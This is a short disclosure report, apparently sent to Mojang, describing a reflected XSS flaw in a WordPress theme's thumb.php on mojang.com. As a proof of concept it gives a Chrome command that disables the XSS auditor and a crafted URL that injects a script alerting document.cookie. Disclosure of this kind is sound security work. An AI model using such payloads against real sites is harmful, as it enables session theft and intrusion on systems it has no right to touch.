Reflected XSS vulnerability on mojang.com

On mojang.com you have reflected XSS vulnerability which is located inside thesis_18 theme.

Proof of concept.

Open for example Chrome browser without XSS auditor:
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --args --disable-xss-auditor

Then use exploit below:
https://mojang.com/wp-content/themes/thesis_18/lib/scripts/thumb.php?src=%3Cscript%3Ealert(document.cookie);%3C/script%3E

You can see exploit in action on attachment.

If you have any other questions feel free to ask.

Greetings,
Kacper Szurek